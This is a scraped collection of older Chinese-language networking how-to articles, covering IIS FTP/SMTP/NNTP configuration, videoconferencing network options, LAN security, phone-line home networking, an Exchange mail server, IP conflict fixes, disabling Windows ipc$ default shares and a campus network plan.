    对于本地目录，请使用完整路径；如 C:\Catalog\Shoes。也可以单击"浏览"按钮选择本地路径而不用键入路径。
    对于网络共享目录，使用 Universal Naming Convention (UNC) 服务器和共享名；如 \\Webserver\Htmlfiles。
    浏览
    通过单击"浏览"选择本地的目录而不用在"路径"文本框中键入路径。

读取
    选择此选项，允许用户阅读或下载存储在主目录或虚拟目录中的文件。
    写入
    允许用户向服务器中已启用的目录上载文件。仅对那些可能接收用户文件的目录选择该选项。
    日志访问
    如果需要将对目录的访问活动记录在日志文件中，请选中该复选框。只有对此 FTP 站点启用了日志记录，才能记录访问活动。默认情况下日志是被启用的。要关闭日志，请选择该 FTP 站点，打开其属性页，单击"FTP 站点"选项卡，然后清除"启用日志"复选框。
    目录列表风格
    MS-DOS :默认情况下 MS-DOS 目录列表风格以 2 位数格式显示年份。也可以更改这种显示年份的设置，方式是启用 FtpDirBrowseShowLongDate。
    UNIX :UNIX目录列表风格在文件日期与 FTP 服务器的年份有区别时以 4 位数格式显示年份。如果文件日期与 FTP 服务器相同，则不会返回年份。

14.3.2.5 目录安全性属性页
    使用此属性页设置特定 IP 地址的访问权限，来阻止某些个人或群组访问服务器。
    TCP/IP 访问限制
    通过指定允许或禁止访问的 IP 地址、子网掩码、一台或多台计算机的域名，就可以控制对 FTP 资源（如站点、虚拟目录或文件）的访问。
    授权访问
    要列出被拒绝访问的计算机，请选择该选项。
    拒绝访问
    要列出允许访问的计算机，请选择该选项。
    添加
    要添加拒绝访问的计算机，请选择"授权访问"按钮，然后单击"添加"。相反，要添加允许访问的计算机，请选择"拒绝访问"按钮，然后单击"添加"。
    注意: 通过代理服务器访问用户服务器的计算机将显示代理服务器的 IP 地址。

14.4. SMTP 的配置
    SMTP 简单邮件传输协议，由于在 LAN 或 Internet 上传送邮件。下面以为 nt2000.com 域建立 SMTP 虚拟服务器为例，说明如何配置 SMTP 服务器。
    步骤1 在 Internet 信息服务管理器中选择需要建立虚拟服务器的域控制器，单击"操作"，然后选择"新建"，选择 "SMTP 虚拟服务器"，启动配置向导
    步骤2 输入虚拟 SMTP 服务器的描述，如图 14.15

    步骤3 选择服务器的 IP 地址
    步骤4 为虚拟服务器选择主目录 如图 14.16，默认目录为 \Inetpub\mailroot

    步骤5 输入虚拟服务器的默认域 如图 14.17，单击"完成"
    在安装完成后，可以通过 SMTP 虚拟服务器的属性页配置本服务器与其它服务器的连接方式、邮件的传送和接收方式。

14.5 NNTP 的配置
    通过配置 NNTP（网络新闻传输协议）服务器可以让客户通过 OutLook 等应用程序阅读新闻组。配置 NNTP 虚拟服务器的具体步骤：
    步骤1 在 Internet 信息服务管理器中选择需要建立虚拟服务器的域控制器，单击"操作"，然后选择"新建"，选择 "NNTP 虚拟服务器"，启动配置向导
    步骤2 输入虚拟 NNTP 服务器的描述，
    步骤3 选择服务器的 IP 地址和 TCP 端口地址，缺省的端口地址为 119，如果使用 SSL 则端口地址变为 563 如图 14.18

步骤4 为虚拟服务器选择主目录 如图 14.19，默认目录为 \Inetpub\nntpfile

步骤5 选择存储 NNTP 的媒体，如图 14.20
    步骤6 选择存储 NNTP 的路径，单击"完成"

在安装完毕后，利用 NNTP 虚拟服务器的属性设置可以修改相关参数，如限制新闻客户的同时连接数，修改客户机的张贴参数。如图 14.21

返回


会议电视系统方案

《一键清理系统垃圾》

会议电视系统方案

许多单位都准备建设自己的会议电视系统，以提高工作效率和管理水平、降低管理费用。但在方案选型时，用户往往对各种厂商的繁多方案感到迷惑，不知到底应采取何种方案。一般来讲，在方案选型时既要考虑本单位的现实需求和目前国家的网络基础设施情况，又要考虑今后的可扩充性。

本文从组网方式、联网线路、图像质量、性能价格比等几个方面综合分析了目前市场上常见的会议电视系统解决方案。

五个决定因素

会议电视系统的选择主要从五个方面来考虑。

组网方式：其组网方式是否灵活、是否适合我国目前网络基础设施建设的现状和未来的发展、联网线路费用是否物有所值等。

视频图像质量：这是系统成败与否的关键。一般来讲，图像的帧速率要求在15帧／秒以上（达到30帧／秒时的图象质量最好）。但图像质量的好坏与联网线路的速率密切相关，这里就有图像质量和联网费用的最佳性能价格比问题。

便携性和灵活性：允许与会人员不受时间、地域的限制，在任何时间、任何地点都能及时出席重要会议，这就要求系统携带方便，安装简单，容易操作，有灵活的输入输出接口。

数据共享：是指会议的参与者可共享系统上的数据和文件，并可对这些数据和文件进行实时的修改。

性能价格比：系统通用性强、扩充性好、性能价格比高，供应商技术支持好。

七种选择方案

本文主要讨论和比较7种不同组网方式的会议电视系统，这些系统方案主要针对跨地域的会议电视系统。

方案1：租用邮电会议电视系统

由于邮电系统已基本建好连接到县一级的会议电视系统，故可租用其系统来召开公司的电视会议。但有三个缺点：其一，必须提前预约，而且必须到当地指定的会场；其二，由于系统是公用的，会议会场由邮电工作人员控制，无法保证公司的会议商业机密不被泄露；其三，其租金也不便宜。

方案2：租用DDN专线的系统

此方案是建设公司自己的会议电视系统，租用邮电DDN专线联网。为了达到可以接受的效果，线路速率至少要达到128kbps以上。而128kbpsDDN数据专线除每条专线每端的初装费高达2万多元外，月租费高达1．4万元（仅仅是128k速率）。这对于每月只开几次会议的通讯线路投资太不划算。

ISDN会议电视系统结构示意图

方案3：架设卫星地面站的系统

此方案除租用卫星的信道费（128kbps每年约17万元）外，每个卫星地面站的建设费用约为20万元。同时，卫星通讯的时延大，不适合对实时性要求高的通讯。显然，此方案也不可取。

方案4：利用电话线的系统

具有投资少、联网容易等优点，但其最大的缺点是图像质量太差，简直无法忍受，会大大影响会议的质量。

方案5：利用ISDN线路的系统

建设公司的会议电视系统，采用ISDN线路，是推荐采用的方案之一。

ISDN线路是电信部门最新推出的联网线路，具有速率高、投资少、费用低、联网方便等特点，能满足基本会议电视系统的应用要求。目前国内已有十几个省市开通了ISDN服务，有些省的ISDN网覆盖到了县级。

从图中可看出，此系统不仅支持基于ISDN的电视会议点，而且支持基于PSTN的电话会议点，同时支持局域网PC的桌面电视会议终端。其主要特点有：

增加电视会议网关（H．320／H．323），这样可充分利用公司内部的网络和电脑设备，使局域网用户的PC会议终端既可同局域网上的其他PC会议终端召开电视会议，也可同局域网外基于ISDN线路的电视会议终端召开电视会议。同样，网外基于ISDN线路的电视会议终端可随时呼叫局域网内的PC会议终端。

通过电视会议网关使得公司总部内部之间召开电视会议直接通过局域网而不需要ISDN线路，节省了ISDN使用费用。

如果局域网PC电视会议终端用户多，而且需要支持多点会议，则需要增加内部用多点会议控制器。

本方案实现了外地ISDN电视会议终端用户、本地局域网PC电视会议终端用户及普通电话用户均可参加公司的电视会议，同时三种用户类型之间均可自由通信。

目前提供支持ISDN线路的电视会议终端设备厂商很多，如Pictel、Vtel、Vcon、Zydacron、Polycom、Tandberg等。

方案6：基于IP技术的电视会议系统

由于Internet在全球的飞速发展，IP应用已成为发展趋势。在电视会议方面，基于IP包交换的国际标准已出台（H．323），一些厂商已开始推出支持H．323协议的电视会议系统设备，一般用于公司内部局域网。

这里推荐采用的方案是利用我国已建成的中国公众多媒体通信网（简称169网），建设基于IP的跨省份会议电视系统（也可利用Internet实现跨国家的电视会议系统，但受目前我国Internet出口带宽不足的制约）。总公司和各地分公司就近接入当地169网，推荐采用ADSL接入方式或无线扩频接入方式，速率为1M～2M，可与数据通讯联网共用同一联网线路，线路成本低，月使用费也低。但由于基于IP的实时通信目前还不能保证QoS，同时169网也不能保证每时每刻都有足够的带宽提供，所以对图像质量和声音质量都有影响。另外，基于H．323的电视会议产品还不是很成熟，但是基于IP的电视会议系统是一个很有前途的发展方向。

方案7：基于ATM的系统

由于ATM技术的最大特点是有QoS保证，对于有线路条件、对质量有很高要求的单位推荐采用此方案。

从图中可看出，只需在现有的ATM网上增加ATM25M接入交换机V－Switch。同时，只需增加ISDN电视会议网关设备V－Gate，就可实现基于ATM的会议电视系统与基于ISDN的会议电视系统互通。

此方案的特点是图像质量很好（可达到MPEGⅡ图象质量），组网方便（不需把所有电视会议终端线路都联到MCU），可靠性高。但设备费用高，且需有ATM网络。

以上分别就7种会议电视系统的解决方案给予了比较，基本上只有方案5、方案6和方案7可以采用，用户应根据自己的具体情况灵活采用某种方案或某两种、甚至三种方案的组合。在采用每一种方案同时还应根据自己资金情况，考虑通讯速率的大小（如ISDN方案中是采用一个BRI接口还是多个，甚至PRI接口），以及图像帧速率等，综合考虑诸多相关因素后，采用一个性能价格比最高的方案。

基于ATM的会议电视系统网络结构示意图

返回


计算机局域网的保密

《一键清理系统垃圾》

计算机局域网的保密

    我国的计算机网络，特别是局域网技术发展最为迅速，许多大专院校、科研院所以及银行、公安、邮电、铁路、石油等部门都建立了自己的局域网，但在实际运作中，由于一些网络是没有保密措施的“裸网”，用户不敢在网上处理涉密信息，使网络的作用得不到充分发挥。因此，开发和运用有效的局域网保密措施，树起坚实的保密防护网，无论现在还是将来都具有十分突出的现实意义。
    局域网信息的保密
    计算机局域网由信息（存储在计算机及其外部设备上的程序及数据）和实体两大部分组成，信息泄露是局域网的主要保密隐患之一。所谓信息泄露，就是被故意或偶然地侦收、截获、窃取、分析、收集到系统中的信息，特别是秘密信息和敏感信息，从而造成泄密事件。局域网在保密防护方面有三点脆弱性：一是数据的可访问性。数据信息可以很容易被终端用户拷贝下来而不留任何痕迹。二是信息的聚生性。当信息以零散形式存在时，其价值往往不大，一旦网络将大量关联信息聚集在一起时，其价值就相当可观了。三是设防的困难性。尽管可以层层设防，但对一个熟悉网络技术的人来说，下些功夫就可能突破这些关卡，给保密工作带来极大的困难。
    从某种意义上可以说，网络的生命在于其保密性。根据近几年的实践和保密技术发展的要求，计算机局域网的保密防范应从以下四个方面入手：
    （1）充分利用网络操作系统提供的保密措施。某些用户对网络的认识不足，基本不用或很少使用网络操作系统提供的保密措施，从而留下隐患。其实，一般的网络操作系统都有相应的保密措施，以美国Novell公司的网络操作系统NetWare为例，它提供的四级保密措施：第一级是入网保密。用户入网时，必须按用户名进行登录注册。使用网络信息资源的用户，必须准确申报自己的用户名，否则将被网络拒之门外。第二级是设置目录和文件访问权限。访问权限是对用户访问目录和文件的合法范围的规定，以控制用户只能操作什么样的目录和文件。准确地划分网络信息的涉密等级、范围和涉密人员，需要网络管理员和保密人员协同工作。第三级是文件和目录的属性保密。属性直接控制对文件或目录的访问特性。属性的访问控制高于文件、目录的有效访问权限，可以禁止有效访问权限所允许的操作。NetWare提供的主要属性控制有：防止对目录和文件的删除；不允许查看目录和文件；禁止对文件进行拷贝；禁止对文件的写操作；控制对文件是否共享；防止文件修改时被破坏；标记被修改过的文件等。第四级是文件服务器的安全保密。即控制台键盘可以加口令封锁，防止非法闯入者以超级用户身份浏览网络信息。
    （2）加强数据库的信息保密防护。网络中的数据组织形式有文件和数据库两种。文件组织形式的数据缺乏共享性，现已成为网络存储数据的主要形式。由于操作系统对数据库没有特殊的保密措施，而数据库的数据以可读的形式存储其中，所以数据库的保密需采取另外的方法。
    （3）采用现代密码技术，加大保密强度。借助现代密码技术对数据进行加密，将重要秘密信息由明文变为密文。
    （4）采用防火墙技术，防止局域网与外部网连通后秘密信息的外泄。局域网最安全的保密方法莫过于不与外部联网（国家规定涉及国家秘密的局域网不得与外部联网），但除了一些重点单位和要害部门，局域网与广域网的连接是大势所趋。防火墙是建立在局域网与外部网络之间的电子系统，用于实现访问控制，即阻止外部入侵者进入局域网内部，而允许局域网内部用户访问外部网络。
    局域网实体的保密
    局域网实体是指实施信息收集、传输、存储、加工处理、分发和利用的计算机及其外部设备和网络部件。它的泄密渠道主要有四个：
    （1）电磁泄露。计算机设备工作时辐射出电磁波，任何人都可以借助仪器设备在一定范围内收到它，尤其是利用高灵敏度的仪器可以稳定、清晰地看到计算机正在处理的信息。另外，网络端口、传输线路等都有可能因屏蔽不严或未加屏蔽而造成电磁泄露。实验表明，未加控制的电脑设施开始工作后，用普通电脑加上截收装置，可以在一千米内抄收其内容。
    （2）非法终端。非法用户有可能在现有终端上并接一个终端，或趁合法用户从网上断开时乘机接入，使信息传到非法终端。
    （3）搭线窃取。局域网与外界连通后，通过未受保护的外部线路，可以从外界访问到系统内部的数据，而内部通讯线路也有被搭线窃取信息的可能。
    （4）介质的剩磁效应。存储介质中的信息被擦除后有时仍会留下可读信息的痕迹。另外，在大多数的信息系统中，删除文件仅仅是删掉文件名，而原文还原封不动地保留在存储介质中，一旦被利用，就会泄密。
    对局域网实体，采取的相应保密措施一般有以下三种：一是防电磁泄露措施。如选用低辐射设备。显示器是计算机保密的薄弱环节，而窃取显示的内容已是一项“成熟”的技术，因此，选用低辐射显示器十分必要。此外，还可以采用距离防护、噪声干扰、屏蔽等措施，把电磁泄露抑制到最低限度。二是定期对实体进行检查。特别是对文件服务器、光缆（或电缆）、终端及其他外设进行保密检查，防止非法侵入。三是加强对网络记录媒体的保护和管理。如对关键的涉密记录媒体要有防拷贝和信息加密措施，对废弃的磁盘要有专人销毁等。


家庭/中小企业廉价实用的联网方案

《一键清理系统垃圾》

家庭/中小企业廉价实用的联网方案

将家庭和中小企业内部的PC联网，以便更有效地传输数据、共享资源、最大限度地节省开支，这是再好不过的了。联网设备包括打印机、扫描仪、数字影像系统、Jaz驱动器等。说起联网，人们自然想到以太网——成熟的技术、齐全的配件、高达10Mbps甚至100Mbps的传输速率。然而，一想到施工队在您心爱的墙壁和地板上到处钻孔，蜘蛛网似地四处布线……不由得使您放弃以太网转而考虑无线网。可高昂的造价，足以使您望而却步。

有没有无需布线、造价低廉、安装和管理又很方便的解决方案呢？答案是“有”。目前，国外已有相应的产品可供选择。现以Tut System的HomeRun为例介绍利用电话线组网。

HomeRun工作原理

HomeRun网络利用现有的电话线，无需重新布线。电话语音使用20Hz到3.4kHz的频段，而HomeRun使用5.5MHz到9.5MHz的高频段传输数据帧，所以用户在传送数据时不会影响正常通话。

HomeRun网络设备的主要特点有：利用现有的电话线和插座、支持即插即用、安装简便、耗电量低（不超过2瓦）、造价低廉等。HomeRun最多可以将25台PC和其它设备相互连接，节点间最大距离为500英尺(约152米)。

HomeRun网络的传输速率可达到1Mbps，与以太网相比似乎慢了些，但比目前市场上流行的56K Modem还要快约20倍，这足以满足家庭和中小企业的需要。

HomeRun联网设备

HomeRun是Tut System公司于1998年推出的新产品，专为家庭和中小企业实现廉价联网而设计的。

HomeRun主要有两个产品：HR1000PCI HomeRun PCI网卡，HR1000T HomeRun以太网适配器。

HR1000PCI NIC是桌面PC的PCI网卡，有两个RJ11插口，一个接来自墙上的电话线，一个接电话机(可省去安装电话线分路器)。另外，预留了一个标准的10Base－T端口，用以连接10Base－T网络，这样可以使用包括打印机在内的几乎所有以太网设备。HR1000PCI网卡提供的驱动程序支持Windows 95/98、Windows NT 3.5.1/NT 4.0，并且安装十分简便。

HR1000T是外置式网络适配器，用以连接像打印机、扫描仪和IP电话等10Base－T设备到HomeRun网。它用标准的RJ45端口连接这些设备，用RJ11端口连接墙上的电话线。

联网方案实例

家庭联网，不仅为了传输数据、共享资源，方便在家办公人员与公司进行联系，还为管理和控制新一代家用电器做好准备。因而，家庭联网前景十分广阔，必将成为系统集成业新的热点。

目前，无论是城镇还是乡村，电话的普及率已相当高。许多房屋在建造时已布好电话线，而HomeRun技术的最大特点便是能够利用现有的电话线组网，并对正常通话毫无干扰。图1是一个典型的家庭HomeRun网络解决方案。

绝大多数中小企业具有规模小、人员少、资金和网络技术人才短缺等特点，其业务需求主要是提供文件和打印机共享、语音和传真、Internet浏览及电子邮件服务等。另外，中小企业的办公场所主要靠租赁，流动性大，所以要求网络系统经济灵活，可随时搬迁。因而，高端昂贵的技术产品和复杂的网络解决方案在此无用武之地。图2是一个宾馆的HomeRun网络综合解决方案。

图1 HomeRun典型家庭网络

图2 HomeRun宾馆网络

返回


家庭/中小企业廉价实用的联网方案

《一键清理系统垃圾》

家庭/中小企业廉价实用的联网方案

    将家庭和中小企业内部的PC联网，以便更有效地传输数据、共享资源、最大限度地节省开支，这是再好不过的了。联网设备包括打印机、扫描仪、数字影像系统、Jaz驱动器等。说起联网，人们自然想到以太网——成熟的技术、齐全的配件、高达10Mbps甚至100Mbps的传输速率。然而，一想到施工队在您心爱的墙壁和地板上到处钻孔，蜘蛛网似地四处布线……不由得使您放弃以太网转而考虑无线网。可高昂的造价，足以使您望而却步。
    有没有无需布线、造价低廉、安装和管理又很方便的解决方案呢？答案是“有”。目前，国外已有相应的产品可供选择。现以Tut System的HomeRun为例介绍利用电话线组网。

    HomeRun工作原理：
    HomeRun网络利用现有的电话线，无需重新布线。电话语音使用20Hz到3.4kHz的频段，而HomeRun使用5.5MHz到9.5MHz的高频段传输数据帧，所以用户在传送数据时不会影响正常通话。
    HomeRun网络设备的主要特点有：利用现有的电话线和插座、支持即插即用、安装简便、耗电量低（不超过2瓦）、造价低廉等。HomeRun最多可以将25台PC和其它设备相互连接，节点间最大距离为500英尺(约152米)。
    HomeRun网络的传输速率可达到1Mbps，与以太网相比似乎慢了些，但比目前市场上流行的56K Modem还要快约20倍，这足以满足家庭和中小企业的需要。

    HomeRun联网设备：
    HomeRun是Tut System公司于1998年推出的新产品，专为家庭和中小企业实现廉价联网而设计的。
    HomeRun主要有两个产品：HR1000PCI HomeRun PCI网卡，HR1000T HomeRun以太网适配器。
    HR1000PCI NIC是桌面PC的PCI网卡，有两个RJ11插口，一个接来自墙上的电话线，一个接电话机(可省去安装电话线分路器)。另外，预留了一个标准的10Base－T端口，用以连接10Base－T网络，这样可以使用包括打印机在内的几乎所有以太网设备。HR1000PCI网卡提供的驱动程序支持Windows 95/98、Windows NT 3.5.1/NT 4.0，并且安装十分简便。
    HR1000T是外置式网络适配器，用以连接像打印机、扫描仪和IP电话等10Base－T设备到HomeRun网。它用标准的RJ45端口连接这些设备，用RJ11端口连接墙上的电话线。

    联网方案实例：
    家庭联网，不仅为了传输数据、共享资源，方便在家办公人员与公司进行联系，还为管理和控制新一代家用电器做好准备。因而，家庭联网前景十分广阔，必将成为系统集成业新的热点。
    目前，无论是城镇还是乡村，电话的普及率已相当高。许多房屋在建造时已布好电话线，而HomeRun技术的最大特点便是能够利用现有的电话线组网，并对正常通话毫无干扰。图1是一个典型的家庭HomeRun网络解决方案。
    绝大多数中小企业具有规模小、人员少、资金和网络技术人才短缺等特点，其业务需求主要是提供文件和打印机共享、语音和传真、Internet浏览及电子邮件服务等。另外，中小企业的办公场所主要靠租赁，流动性大，所以要求网络系统经济灵活，可随时搬迁。因而，高端昂贵的技术产品和复杂的网络解决方案在此无用武之地。图2是一个宾馆的HomeRun网络综合解决方案。

    图1 HomeRun典型家庭网络

    图2 HomeRun宾馆网络

返回


建个经济实用的上网教室

《一键清理系统垃圾》

建个经济实用的上网教室

    在Internet日益普及的今天，许多学校都将Internet作为教学内容之一。但在建设上网教室时，大家都碰到这样一个问题：通过一条专线上网，上网速度虽快，但费用太高，一般学校负担不起；通过一根电话线上网，费用虽低，但多人上网时速度很慢。如何才能让学校既少花钱又给学生提供实实在在的上网教室呢？本人通过实践得出如下方案。
    一、设计思想
    由于上网教室主要是用来教学生如何上网的，上网的都是新手，他们所访问的Web站点基本上也都是教师推荐的热门站点，所以，我们就可用离线浏览器将一些热门站点“克隆”下来，存放在服务器上，然后再制作一个主页，将这些站点链接起来。这样，学生访问服务器上的主页和通过主页访问各个热门站点就变成了局域网内部的信息传送。由于局域网传输速度很高，所以学生上网就不会有共用一根电话线时那种老牛拉破车的痛苦感觉了。同时由于大量的信息传送都是在局域网内部进行的，所以通过Modem传输的数据就少，偶尔访问到没下载网站的学生也不会觉得速度慢。
    二、硬件配置
    工作站配置为奔腾586/100、16M内存、NE2000兼容网卡。服务器配置为P II 266、64M内存、4.3G硬盘、33.6K Modem、NE2000兼容网卡。另外电话线和Internet账号是不能少的。
    三、必备软件
    必备软件包括Win95、中文版IE4.0、SyGate(Modem共享软件,1.2M,下载地址为http://www.sygate.com)、Teleport Pro1.29(离线浏览器，下载地址为http://www.tenmax.com)或WebZip2.10(下载地址为http://www.spidersoft.com)、FrontPage98(主页制作工具)。
    四、创建过程
  ?我们创建的局域网是Win95对等网，这种网组成简单，使用方便。其创建过程如下：
    1．所有微机都安装Win95和IE4.0，然后配置成对等网络
    其中服务器配置为共享(顺序选取“控制版面”→“网络”→“文件和打印共享”，点选两个选项都有效)。所有机器上都添加Microsoft TCP/IP协议(顺序选取“控制面版”→“网络”→“添加”→“协议”→Microsoft→TCP/IP)。
    2．网络的TCP/IP设置
    在服务器上IP地址填192.168.0.1；子网掩码填255.255.255.0；网关填无；DNS填无。在工作站上IP地址填192.168.0.X(X=2、3、4、……，各机的IP地址不能相同)；子网掩码填255.255.255.0；网关填192.168.0.1；DNS填192.168.0.1或我们的ISP提供的DNS地址。
    TCP/IP设置完成后，需要确认是否可以正常工作。在各个工作站和服务器上，进入MS－DOS方式，键入命令：ping 192.168.0.1，如果出现“reply form……”的提示，说明连接无误；如果出现“Request timeout”等提示，说明有问题，还需检查。
    3．SyGate的安装与调试
    下载sg20.exe后，在服务器上安装它(其它的机器不需做任何设置)。安装完后，SyGate将会启动并弹出如图1所示对话框，这时不需要做任何设置。直接启动拨号网络，拨号上网。上网成功后，从工作站上进入MS-DOS方式，输入命令：ping 202.96.64.68,看是否已连通。如果已连通，则说明SyGate已经干活了！
    缺省设置下，SyGate就工作得很好，所以我们完全不需要任何其它的设置，如果愿意的话，我们可以做一些简单的改变，让SyGate工作得更合心愿！
    4．离线浏览器Teleport Pro的安装使用
    Teleport Pro是一个很好的离线浏览器，我们可以用它来复制整个站点或某个部分。它的安装十分简单，和大多数应用程序的安装一样，按照提示安装即可。
    Teleport Pro的使用也非常简单，它的“New Project Wizard(新项目指南)”可使我们很容易地设定和执行一个新的Teleport Pro项目。具体操作如下：打开菜单，选择New Project Wizard命令；或者用鼠标点击工具栏上的第一个按钮。接下来Teleport Pro询问需要它为我们做什么。其中有几个选项：(1)Create a browsable copy of a website on my hard drive:在我的硬盘上建立一个可供浏览的网站副本。这是默认选项；(2)Duplicate a website,including director:复制一个网站，包括目录结构。我们可以用此功能“克隆”整个站点。这是我们迫切需要的功能，选择此项。其余选项可不考虑。单击下一步(next)继续，接着，Teleport请我们输入欲下载网站的起始地址。输入一个URL地址作为项目执行的起始位置。www.nease.net、www.cpcw.com等都是有效地址。下面的空白栏给出欲下载网站的名称或者是我们自己的注释。单击“下一步”继续。接下来是项目配置，根据需要选择一项。再按“下一步”继续。当我们按下“完成(Finish)”按钮时系统会询问我们是否存储Teleport Pro项目，如果选择存储，则请我们选择Project菜单中的Start命令或者按工具栏上的第八个按钮。接着我们可以清晰地看见Teleport Pro的下载网站的过程。至此，我们利用“新项目指南”完成了一个网站的下载任务。以后，用此法就可将一个个热门网站“克隆”下来。当然“克隆”的网站越多越好。最后，将这些“站点”所在的目录(例如My Internet)设置成共享。
    5．制作主页
    首选工具为FrontPage98，辅助工具为Paint shop pro5.0、3Dxara 3D2等。先新建一个普通空白页，在其上输入文字或插入图形。选中各站点名字，插入超级链接，链接到相应站点的Indexhtm文件上。以电脑报为例，选中“电脑报”，单击工具栏上的“插入”按钮，点取“超级链接”，再点取“查找文件的图标”后，出现一对话框。注意！这里一定要点取“网上邻居”，然后再选取“Teacher计算机”(即服务器)、电脑报站点所在的共享目录，最后找到Inedx.htm文件，单击“确定”。
    我们点取“网上邻居”，而不选取C:或D:盘的原因是：做成的主页最后要在工作站上浏览，如果不用全局文件名，而用本地文件名(即:///C:/My Internet/www.cpcw.com/index.htm)的话，工作站上将无法链接到此站点。主页做成后，将主页所在目录(如C:\FrontPage Webs)设置成共享。
    为使学员浏览方便，可将工作站上浏览器的默认主页。具体作法是：点击“查看”→“Internet选项…”→“常规”，在地址栏中填入\\Teacher\FrontPage Webs\Content\My webs\Index.htm。好了，现在上网教室的软件就装好了，感受一下速度吧，爽！快！！！
    本网的特点是快而安全，最适合教学和培训。感兴趣的同志可自己也建一个。

返回


建立因特网上的邮件服务器

《一键清理系统垃圾》

建立因特网上的邮件服务器

一、安装Windows NT Server 4.0
    Exchange Server只能与Windows NT Server一起使用，因此必须先在服务器上安装Windows NT Server。安装过程中请注意以下两点：
    1．在选择分区格式时，应将系统分区格式化为NTFS。
    2．在选择域控制器状态时，应把服务器加到现有的NT域中，使之成为一台普通的NT服务器。
    二、安装Windows NT4.0 Server Pack3 (SP3)
    SP3是Windows NT4.0的升级服务包，除修正原有错误外，还包括了NT4.0发布后的新技术支持。安装结束重新启动后，会看到操作系统管理器的版本已由4.0变为4.01，版本号已由“Build I381 Server Pack1”改为“Build I381 Server Pack3”。
    三、安装Exchange Server5.5
    根据安装向导的提示创建组织和新节点，指定节点服务账号，最后运行优化程序（优化程序会把数据库文件移动到服务器的其他硬盘和分区上，从而提高Exchange Server的性能）。安装完毕后，要验证Exchange 是否成功启动了必要的服务，在“Start”－“Settings”－“Control Panel”－“Service”中，查看是否启动了以下服务：
    Microsoft Exchange Directory
    Microsoft Exchange Information Store
    Microsoft Exchange Message Transfer Agent
    Microsoft Exchange System Attendant
    MS Mail Connector Interchange
    Remote Procedure Call (RPC) Locator
    Remote Procedure Call (RPC) Service
    四、设置Exchange Server5.5
    启动“Start”－“Programs”－“Microsoft Exchange ”－“Microsoft Exchange Administrator”，对Exchange Server进行设置。
    1．安装和启动Internet Mail Service:
    Internet Mail Service是一个Windows NT服务，它安装在Exchange Server服务器上，能够从支持SMTP的计算机上接收和发送电子邮件。进入“Microsoft Exchange Administrator”后，在“File”菜单中，指向“New Other”，然后单击“Internet Mail Service” ，运行安装向导，除选择“使用DNS收发邮件”和“创建节点邮件地址(如WTM.JS.CN)”外，其余对话框全部取默认值。
    2．验证POP3协议：
    进入“Microsoft Exchange Administrator”后，在Configuration容器下，单击Protocols，在右边窗口中，双击POP3对象，验证POP3协议是否已启用。
    3．为NT域内用户设置邮箱：
    进入“Microsoft Exchange Administrator”后，在“File”菜单中，指向“New Mailbox”，出现邮箱属性窗口，单击“Primary Windows NT Account”,选择“Select an existing Windows NT account”，为NT域内用户逐一添加邮箱。
    邮件服务器安装设置至此全部完成。
    五、在Web服务器上为Exchange 创建DNS记录
    邮件服务器必须安装TCP/IP协议，分配IP地址，并为网络的“域名服务”(DNS)提供信息。在DNS中需添加以下两条记录：
    1.A记录：又称地址记录。例如本单位的邮件服务器主机名为MAIL，Internet域名是WTM.JS.CN，IP地址是210.45.0.82，则A记录应为：MAIL.WTM.JS.CN.IN A 210.45.0.82。
    2. MX记录：告诉哪台计算机负责为系统处理SMTP邮件。例如本单位想把所有关联域地址WTM.JS.CN的邮件发送到主机MAIL上，则MX记录为：WTM.JS.CN.IN MX 10 MAIL.WTM.JS.CN。
    六、客户端收发邮件功能的实现
    NT域内用户可利用电子邮件客户端程序（如Outlook Express），完成电子邮件收发功能。首先添加自己的邮件账号，把SMTP和POP3服务器设置为已安装后的邮件服务器，如本单位的MAIL.WTM.JS.CN，登录账号和口令则与NT域内的一致。设置完成后，就可收发电子邮件了。
     这样，每个NT域内用户都可以拥有自己的Internet电子邮件信箱。

返回


IP地址冲突问题的解决方法

《一键清理系统垃圾》

IP地址冲突问题的解决方法

    当计算机使用过程中出现“计算机探测到IP地址与您的网卡物理地址发生冲突”的错误时，您就无法使用网络。此时，您可以做如下操作解决问题：

    1 如果您使用的计算机的操作系统是：windows 98

    点击左下角“开始”→“运行”，键入：winipcfg，点击“确定”，在弹出的窗口中，点击“全部释放”，然后点击“全部更新”，即可解决问题。

    如果系统提示无法更新，则需要重新启动计算机。

    2 如果您使用的计算机的操作系统是：windows 2000 或windows XP

    点击左下角“开始”→“运行”，键入：ipconfig /release，点击“确定”，在此点击“开始”→“运行”，键入：ipconfig /renew，点击“确定”，即可解决问题。


禁止ipc$默认共享的方法

《一键清理系统垃圾》

禁止ipc$默认共享的方法

以下四种方法可以参考一下:
A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1，先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………（有几个删几个）
2，禁止建立空连接
  首先运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]

把RestrictAnonymous（DWORD）的键值改为：00000001。
  3，禁止自动打开默认共享
 

对于server版，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerPara

meters]把AutoShareServer（DWORD）的键值改为:00000000。
对于pro版，则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把Au

toShareWks（DWORD）的键值改为:00000000。
B、另一种是关闭ipc$和默认共享依赖的服务（不推荐）
net stop lanmanserver
可能会有提示说，XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码，防止通过ipc$穷举密码。但如果你有其他漏洞，ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙，或者端口过滤。


经济实用建设校园网

《一键清理系统垃圾》

经济实用建设校园网

北电四川大学校园网网络方案一览

四川大学校园网是西南地区最大的校园网，该网在全校范围内建立了信息管理系统，希望可以实现电子邮件、多媒体通信、数据库信息系统的统一管理，并实现内部局域网与Internet互联等功能。在充分满足用户需求的前提下，遵循“少花钱、多办事、办好事”的原则，结合校园网布线系统及实际网络应用的需要和发展，我们进行了网络系统总体规划，其中重点考虑了整个网络的包交换能力、可扩充性、易管理性等综合性能。

四川大学校园网络系统图

网络要求

根据需求，四川大学校园网的应用应达到如下要求：

●以宽带IP网为目标，建立数据、语音、视频三网合一的一体化网络；

●为提高网络可靠性及安全性，校园主干网应全部采用光纤布线;

●校园网可以实现虚拟网功能，以保证全网的良好性能及网络安全性；

●主干网交换机可以实现高速包交换；

●整个网络应具有高速的三层交换能力；

●选用先进的网管软件，建立完善的网络管理体系；

●为Internet、拨号用户、移动用户均可提供接口；

●网络应具有良好的扩展性。

